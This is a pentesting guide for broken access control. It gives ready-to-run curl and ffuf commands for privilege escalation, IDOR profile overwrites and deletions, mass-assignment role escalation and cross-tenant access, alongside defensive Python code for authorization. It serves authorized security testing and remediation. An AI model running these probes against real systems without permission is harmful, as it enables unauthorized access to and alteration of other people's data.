Testing for Broken Access Control

When to Use

  • During authorized penetration tests as the primary assessment for OWASP A01:2021 - Broken Access Control
  • When evaluating role-based access control (RBAC) implementations across all application endpoints
  • For testing multi-tenant applications where users in one organization should not access another's data
  • When assessing API endpoints for missing or inconsistent authorization checks
  • During security audits where privilege escalation and unauthorized access are primary concerns

Prerequisites

  • Authorization: Written penetration testing agreement for the target
  • Burp Suite Professional: With the Autorize extension for automated access control testing
  • Multiple test accounts: Accounts at each role level (admin, manager, user, guest)
  • Application role matrix: Documentation of what each role should and should not access
  • curl/httpie: For manual endpoint testing with different authentication contexts
  • ffuf: For discovering hidden endpoints that may lack access controls

Workflow

Step 1: Map All Endpoints and Create Access Control Matrix

Document every endpoint and the expected access level for each role.

Extract all endpoints from the Burp Site Map: Target > Site Map > Right-click > Copy URLs in this host.

Build a matrix of endpoints vs roles ("Own" means the role may only act on objects it owns):

| Endpoint               | Admin | Manager | User | Guest |
|------------------------|-------|---------|------|-------|
| GET /admin/dashboard   | Allow | Deny    | Deny | Deny  |
| GET /api/users         | Allow | Allow   | Deny | Deny  |
| PUT /api/users/{id}    | Allow | Deny    | Own  | Deny  |
| DELETE /api/posts/{id} | Allow | Allow   | Own  | Deny  |

Then discover endpoints the Site Map does not show, using a low-privilege token so the results already reflect what that role can reach:

```bash
# USER_TOKEN: raw JWT of a low-privilege test account

# Discover hidden endpoints
ffuf -u "https://target.example.com/FUZZ" \
  -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
  -mc 200,301,302,403 -fc 404 \
  -H "Authorization: Bearer $USER_TOKEN" \
  -o endpoints.json -of json

# API endpoint discovery
ffuf -u "https://target.example.com/api/v1/FUZZ" \
  -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt \
  -mc 200,201,204,301,302,401,403,405 -fc 404 \
  -H "Authorization: Bearer $USER_TOKEN"
```
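The matrix above only becomes a finding once each cell is compared with what a role actually received. The following is an added example (not code from the original page) that reduces an Allow/Deny/Own cell plus an observed status code to the PASS/FAIL verdicts used in the report template later on; the endpoints, roles and status codes are constructed sample data, and the `Observation` type and `SERVED` set are this example's own conventions.

```python
"""Evaluate observed responses against the Step 1 access control matrix.

Added example, not code from the original page. It maps each matrix cell
(Allow / Deny / Own) plus the status code a role actually received to the
Expected/Actual verdicts used in the assessment report. Endpoints, roles
and status codes below are constructed sample data.
"""
from dataclasses import dataclass
from typing import List, Tuple

# Expected policy per endpoint and role, copied from the Step 1 matrix.
# "Own" means the role may only act on objects it owns.
MATRIX = {
    "GET /admin/dashboard":   {"admin": "Allow", "manager": "Deny",  "user": "Deny", "guest": "Deny"},
    "GET /api/users":         {"admin": "Allow", "manager": "Allow", "user": "Deny", "guest": "Deny"},
    "PUT /api/users/{id}":    {"admin": "Allow", "manager": "Deny",  "user": "Own",  "guest": "Deny"},
    "DELETE /api/posts/{id}": {"admin": "Allow", "manager": "Allow", "user": "Own",  "guest": "Deny"},
}

# Status codes treated as "the request was served". A 302 to the login page
# counts as denied here; confirm the redirect target by hand before trusting it.
SERVED = {200, 201, 204}


@dataclass(frozen=True)
class Observation:
    endpoint: str
    role: str
    own_object: bool  # True when the request targeted the caller's own object
    status: int


def expected_outcome(policy: str, own_object: bool) -> str:
    """Reduce a matrix cell to 'allow' or 'deny' for one concrete request."""
    if policy == "Allow":
        return "allow"
    if policy == "Own":
        return "allow" if own_object else "deny"
    return "deny"


def verdict(obs: Observation) -> str:
    """PASS when expected and observed agree; FAIL when a request that should
    have been denied was served (an access control finding); UNEXPECTED_DENY
    when an allowed request was refused (a functional bug, not a security finding)."""
    expected = expected_outcome(MATRIX[obs.endpoint][obs.role], obs.own_object)
    actual = "allow" if obs.status in SERVED else "deny"
    if expected == actual:
        return "PASS"
    return "FAIL" if expected == "deny" else "UNEXPECTED_DENY"


def evaluate(observations: List[Observation]) -> List[Tuple[str, str, str, int, str]]:
    """Rows of (endpoint, role, policy, status, verdict) for the report table."""
    return [(o.endpoint, o.role, MATRIX[o.endpoint][o.role], o.status, verdict(o))
            for o in observations]


def failures(observations: List[Observation]) -> List[Tuple[str, str, str, int, str]]:
    return [row for row in evaluate(observations) if row[4] == "FAIL"]


# Constructed observations mirroring the findings in the Output Format section.
SAMPLE = [
    Observation("GET /admin/dashboard", "admin", False, 200),
    Observation("GET /admin/dashboard", "user", False, 200),    # vertical escalation
    Observation("GET /admin/dashboard", "guest", False, 302),   # redirected to login
    Observation("PUT /api/users/{id}", "user", True, 200),      # own profile: fine
    Observation("PUT /api/users/{id}", "user", False, 200),     # other user's profile: IDOR
    Observation("DELETE /api/posts/{id}", "guest", False, 401),
    Observation("GET /api/users", "manager", False, 403),       # allowed role refused: functional bug
]

if __name__ == "__main__":
    for endpoint, role, policy, status, result in evaluate(SAMPLE):
        print(f"{endpoint:<24} {role:<8} expected={policy:<6} status={status} {result}")
```

Feed it the status codes collected by the curl loops in Steps 3 to 6 (one `Observation` per endpoint and role) and the `failures()` list is the raw material for the "Access Control Matrix Results" table; the separate `UNEXPECTED_DENY` verdict keeps functional bugs out of the security findings.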

Step 2: Configure Automated Access Control Testing

Set up the Burp Autorize extension for parallel role-based testing.

```
# Install Autorize extension:
Burp > Extender > BApp Store > Search "Autorize" > Install

# Configuration for three-tier testing:
1. Browse the application as Admin (capture all requests)
2. In the Autorize tab:
   a. Add the Regular User's session token in "Replace cookies/headers"
   b. Optionally add a second row for Unauthenticated (no auth header)

# Example header replacement setup:
Row 1 (Low-privilege user):
  Cookie: session=low_priv_user_session
  Authorization: Bearer low_priv_token

Row 2 (Unauthenticated):
  [Empty - removes all auth headers]

# Enable interception in Autorize:
- Check "Intercept requests from Proxy"
- Check "Intercept requests from Repeater"

# Autorize shows results as:
Green  = Properly restricted (different response for the low-privilege user)
Red    = POTENTIALLY VULNERABLE (same response regardless of role)
Orange = Uncertain (needs manual verification)
```

Step 3: Test Vertical Privilege Escalation

Attempt to access higher-privilege functionality with lower-privilege accounts.

```bash
# Collect tokens for each role
ADMIN_TOKEN="Bearer admin_jwt_here"
MANAGER_TOKEN="Bearer manager_jwt_here"
USER_TOKEN="Bearer user_jwt_here"

# Test admin endpoints with user token
ADMIN_ENDPOINTS=(
  "GET /admin/dashboard"
  "GET /admin/users"
  "POST /admin/users/create"
  "PUT /admin/settings"
  "DELETE /admin/users/5"
  "GET /admin/logs"
  "GET /admin/reports/export"
  "POST /admin/backup"
)

for entry in "${ADMIN_ENDPOINTS[@]}"; do
  method=$(echo "$entry" | cut -d' ' -f1)
  endpoint=$(echo "$entry" | cut -d' ' -f2)
  echo -n "$method $endpoint (as user): "
  status=$(curl -s -o /dev/null -w "%{http_code}" \
    -X "$method" \
    -H "Authorization: $USER_TOKEN" \
    -H "Content-Type: application/json" \
    "https://target.example.com$endpoint")
  if [ "$status" == "200" ] || [ "$status" == "201" ]; then
    echo "VULNERABLE ($status)"
  else
    echo "OK ($status)"
  fi
done

# Test with method override headers
curl -s -o /dev/null -w "%{http_code}" \
  -X POST \
  -H "Authorization: $USER_TOKEN" \
  -H "X-HTTP-Method-Override: DELETE" \
  "https://target.example.com/admin/users/5"

# Test with different HTTP methods
for method in GET POST PUT PATCH DELETE OPTIONS HEAD; do
  echo -n "$method /admin/users: "
  curl -s -o /dev/null -w "%{http_code}" \
    -X "$method" \
    -H "Authorization: $USER_TOKEN" \
    "https://target.example.com/admin/users"
  echo
done
```

Step 4: Test Horizontal Privilege Escalation

Verify that users cannot access resources belonging to other users at the same privilege level.

```bash
# User A (ID: 101) testing access to User B's (ID: 102) resources
USER_A_TOKEN="Bearer user_a_jwt"

RESOURCES=(
  "/api/users/102/profile"
  "/api/users/102/orders"
  "/api/users/102/messages"
  "/api/users/102/documents"
  "/api/users/102/settings"
  "/api/users/102/payment-methods"
)

for resource in "${RESOURCES[@]}"; do
  echo -n "GET $resource: "
  response=$(curl -s -w "\n%{http_code}" \
    -H "Authorization: $USER_A_TOKEN" \
    "https://target.example.com$resource")
  status=$(echo "$response" | tail -1)
  body_len=$(echo "$response" | head -n -1 | wc -c)   # head -n -1 needs GNU coreutils
  if [ "$status" == "200" ] && [ "$body_len" -gt 50 ]; then
    echo "VULNERABLE ($status, $body_len bytes)"
  else
    echo "OK ($status)"
  fi
done

# Test write operations across users
curl -s -X PUT \
  -H "Authorization: $USER_A_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"name":"Hacked","email":"hacked@evil.com"}' \
  "https://target.example.com/api/users/102/profile" -w "%{http_code}"

# Test delete operations
curl -s -X DELETE \
  -H "Authorization: $USER_A_TOKEN" \
  "https://target.example.com/api/users/102/documents/1" -w "%{http_code}"
```

Step 5: Test Function-Level Access Control

Verify that specific functions enforce authorization properly.

```bash
# Test unauthenticated access to protected endpoints
PROTECTED_ENDPOINTS=(
  "/api/user/profile"
  "/api/transactions"
  "/api/settings"
  "/admin/dashboard"
  "/api/export/users"
)

for endpoint in "${PROTECTED_ENDPOINTS[@]}"; do
  echo -n "No auth: GET $endpoint: "
  curl -s -o /dev/null -w "%{http_code}" \
    "https://target.example.com$endpoint"
  echo
done

# Test with expired/invalid tokens
curl -s -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer invalid_token_here" \
  "https://target.example.com/api/user/profile"

# Test role manipulation in JWT claims
# If the JWT contains a role claim, try modifying it
# (requires a JWT vulnerability - see the JWT testing skill)

# Test parameter-based role escalation
curl -s -X PUT \
  -H "Authorization: $USER_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"role":"admin","is_admin":true,"permissions":["admin","superuser"]}' \
  "https://target.example.com/api/users/101/profile"

# Test registration with elevated role
curl -s -X POST \
  -H "Content-Type: application/json" \
  -d '{"email":"new@test.com","password":"Test123!","role":"admin"}' \
  "https://target.example.com/api/auth/register"
```

Step 6: Test Multi-Tenant Isolation

Verify that tenant boundaries are enforced in multi-tenant applications.

```bash
# User in Tenant A testing access to Tenant B's resources
TENANT_A_TOKEN="Bearer tenant_a_user_jwt"

# Direct tenant resource access
curl -s -H "Authorization: $TENANT_A_TOKEN" \
  "https://target.example.com/api/organizations/tenant-b-id/users" | jq .
curl -s -H "Authorization: $TENANT_A_TOKEN" \
  "https://target.example.com/api/organizations/tenant-b-id/settings" | jq .

# Test tenant switching via header
curl -s -H "Authorization: $TENANT_A_TOKEN" \
  -H "X-Tenant-ID: tenant-b-id" \
  "https://target.example.com/api/users" | jq .

# Test tenant ID in request body
curl -s -X POST \
  -H "Authorization: $TENANT_A_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"tenant_id":"tenant-b-id","query":"SELECT * FROM users"}' \
  "https://target.example.com/api/reports/custom"

# Enumerate tenant IDs (process substitution requires bash)
ffuf -u "https://target.example.com/api/organizations/FUZZ" \
  -w <(seq 1 100) \
  -H "Authorization: $TENANT_A_TOKEN" \
  -mc 200 -t 10 -rate 20
```

Key Concepts

| Concept | Description |
|---------|-------------|
| Vertical Privilege Escalation | Lower-privilege user accessing higher-privilege functionality (user -> admin) |
| Horizontal Privilege Escalation | User accessing another user's resources at the same privilege level |
| Function-Level Access Control | Authorization checks on specific features/functions regardless of URL |
| RBAC | Role-Based Access Control - permissions assigned to roles, roles assigned to users |
| ABAC | Attribute-Based Access Control - permissions based on user/resource/environment attributes |
| Multi-Tenant Isolation | Ensuring data and functionality separation between different organizations/tenants |
| Insecure Direct Object Reference | Accessing objects by manipulating identifiers without authorization checks |
| Missing Function-Level Check | Endpoint exists but does not verify the caller has permission to invoke it |

Tools & Systems

| Tool | Purpose |
|------|---------|
| Burp Suite Professional | Request interception and role-based testing |
| Autorize (Burp Extension) | Automated access control testing across sessions |
| AutoRepeater (Burp Extension) | Automatically replays requests with different auth contexts |
| Postman | API testing with environment switching between roles |
| ffuf | Discovering hidden endpoints that may lack access controls |
| OWASP ZAP | Access control testing with context-aware scanning |

Common Scenarios

Scenario 1: Admin Panel Without Auth Check

The `/admin/dashboard` endpoint returns the admin panel when accessed with a regular user's session token. The front-end hides the admin menu, but the back-end does not enforce role checks.

Scenario 2: API Endpoint Missing Authorization

The `DELETE /api/users/{id}` endpoint checks for authentication (valid token) but not authorization (admin role). Any authenticated user can delete any other user's account.

Scenario 3: Tenant Data Leakage

A SaaS application uses `tenant_id` in API request headers. Changing the `X-Tenant-ID` header to another tenant's ID returns their data, bypassing tenant isolation.

Scenario 4: Mass Assignment Role Escalation

The user profile update endpoint at `PUT /api/users/{id}` accepts a `role` field in the JSON body. Submitting `"role":"admin"` alongside a profile update elevates the user to administrator.

Output Format

```
Broken Access Control Assessment Report

Target: target.example.com
Assessment Date: 2024-01-15
OWASP Category: A01:2021 - Broken Access Control

Access Control Matrix Results

| Endpoint                      | Admin | Manager | User | Guest | Expected    | Actual |
|-------------------------------|-------|---------|------|-------|-------------|--------|
| GET /admin/dashboard          | 200   | 200     | 200  | 302   | Admin only  | FAIL   |
| DELETE /api/users/{id}        | 200   | 200     | 200  | 401   | Admin only  | FAIL   |
| GET /api/users/other/profile  | 200   | 200     | 200  | 401   | Own only    | FAIL   |
| PUT /api/users/other/settings | 200   | 200     | 200  | 401   | Own only    | FAIL   |
| GET /api/org/other-tenant     | 200   | 200     | 200  | 401   | Same tenant | FAIL   |

Critical Findings

1. Vertical Escalation: Regular users can access /admin/* endpoints
2. Horizontal IDOR: Users can read/modify other users' profiles
3. Tenant Isolation: Cross-tenant data access via header manipulation
4. Mass Assignment: Role escalation via profile update endpoint

Impact

- Complete administrative access for any authenticated user
- Full user data access across all accounts (15,000+ users)
- Cross-tenant data breach affecting 200+ organizations
- Account takeover via profile modification

Recommendation

1. Implement server-side authorization checks on every endpoint
2. Use a centralized authorization middleware/framework
3. Enforce object-level authorization (verify ownership before access)
4. Validate tenant context server-side, never from client headers
5. Use allowlists for mass assignment (only permit expected fields)
6. Implement audit logging for all access control decisions
```
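The six recommendations above, and the Scenario 4 mass-assignment case they address, fit in one small authorization layer. The following is an added example (not code from the original page): a framework-free sketch in which every handler passes through a single `authorize()` function that applies the role rule, the ownership check and the tenant boundary, drops non-allowlisted profile fields, and records each decision. Users, documents, tenant IDs and the `POLICY` action names are constructed sample data; the assumption that "admin" is a tenant-scoped role is this example's own.

```python
"""Centralized server-side authorization implementing the six recommendations
above. Added example, not code from the original page: a framework-free
sketch in which every handler passes through authorize() before touching
data. Users, documents and tenant IDs are constructed sample data.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Session:
    """Server-side session: role and tenant are bound at login, never taken
    from request headers or the body (recommendation 4)."""
    user_id: int
    role: str        # admin, manager, user, guest
    tenant_id: str


class Forbidden(Exception):
    pass


# Constructed data stores.
USERS = {
    1:   {"name": "root",  "email": "root@example.test",  "role": "admin", "tenant_id": "tenant-a"},
    101: {"name": "alice", "email": "alice@example.test", "role": "user",  "tenant_id": "tenant-a"},
    102: {"name": "bob",   "email": "bob@example.test",   "role": "user",  "tenant_id": "tenant-b"},
}
DOCUMENTS = {
    7: {"owner_id": 101, "tenant_id": "tenant-a", "title": "Q1 plan"},
    8: {"owner_id": 102, "tenant_id": "tenant-b", "title": "Bob's notes"},
}

# Recommendations 1 and 2: one policy table consulted by every handler.
# "own" means the caller must own the object (recommendation 3).
# Roles missing from a row are denied by default.
POLICY = {
    "admin.dashboard": {"admin": "allow"},
    "users.update":    {"admin": "allow", "user": "own"},
    "documents.read":  {"admin": "allow", "manager": "allow", "user": "own"},
}

# Recommendation 5: the only profile fields a client may set. Anything else
# (role, is_admin, permissions, ...) is dropped before it reaches the model.
PROFILE_WRITABLE = {"name", "email"}

# Recommendation 6: every decision, allowed or denied, is recorded.
AUDIT_LOG: List[dict] = []


def authorize(session: Session, action: str, resource: Optional[dict] = None) -> None:
    """Single choke point: role rule, then ownership, then tenant boundary."""
    rule = POLICY.get(action, {}).get(session.role, "deny")
    allowed = rule == "allow" or (
        rule == "own" and resource is not None and resource.get("owner_id") == session.user_id
    )
    # Tenant boundary applies to everyone, including admins (a tenant-scoped
    # admin role is assumed here): the object's tenant must match the session's.
    if allowed and resource is not None and resource.get("tenant_id") != session.tenant_id:
        allowed = False
    AUDIT_LOG.append({"user": session.user_id, "role": session.role, "action": action,
                      "object": None if resource is None else resource.get("id"),
                      "decision": "allow" if allowed else "deny"})
    if not allowed:
        raise Forbidden(f"{session.role} {session.user_id} may not {action}")


def is_allowed(session: Session, action: str, resource: Optional[dict] = None) -> bool:
    """Boolean wrapper around authorize(); the decision is still audited."""
    try:
        authorize(session, action, resource)
        return True
    except Forbidden:
        return False


def read_document(session: Session, doc_id: int) -> dict:
    doc = dict(DOCUMENTS[doc_id], id=doc_id)
    authorize(session, "documents.read", doc)
    return doc


def update_profile(session: Session, user_id: int, body: dict) -> dict:
    target = dict(USERS[user_id], id=user_id, owner_id=user_id)  # a user owns their own profile
    authorize(session, "users.update", target)
    safe = {k: v for k, v in body.items() if k in PROFILE_WRITABLE}  # mass-assignment allowlist
    USERS[user_id].update(safe)
    return dict(USERS[user_id])


def admin_dashboard(session: Session) -> str:
    authorize(session, "admin.dashboard")
    return "admin dashboard"


if __name__ == "__main__":
    alice = Session(101, "user", "tenant-a")
    print(update_profile(alice, 101, {"name": "Alice", "role": "admin"}))  # role silently dropped
    print(is_allowed(alice, "documents.read", dict(DOCUMENTS[8], id=8)))  # False: other tenant
    for entry in AUDIT_LOG:
        print(entry)
```

Because `authorize()` is the only path to data, the five FAIL rows in the report template map to one denied decision each: the admin route denies non-admin roles, object routes deny callers who are not the owner, cross-tenant objects are refused even when the role rule passes, and the `role` field in a profile update never reaches the model. The audit log gives the detection side the same decisions in a form that can be alerted on, for example a burst of denied `users.update` entries from one user against many object IDs.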